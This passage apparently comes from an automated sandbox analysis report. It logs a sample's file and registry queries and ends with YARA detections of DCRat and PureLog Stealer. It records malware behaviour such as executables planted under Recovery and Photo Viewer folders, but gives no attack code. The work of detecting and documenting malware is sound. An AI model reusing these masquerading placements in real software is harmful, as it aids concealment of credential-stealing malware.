                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeQueries volume information: C:\Users\user\Desktop\JNKHlxGvw4.exe VolumeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeQueries volume information: C:\Users\user\Desktop\JNKHlxGvw4.exe VolumeInformation
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeQueries volume information: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe VolumeInformation
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeQueries volume information: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe VolumeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeQueries volume information: C:\Recovery\USZqVcJFLA.exe VolumeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe VolumeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeQueries volume information: C:\Recovery\USZqVcJFLA.exe VolumeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000000.00000002.1861105197.00000000128AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: JNKHlxGvw4.exe PID: 6588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: USZqVcJFLA.exe PID: 1432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7808, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.JNKHlxGvw4.exe.1ad80000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack, type: UNPACKEDPE
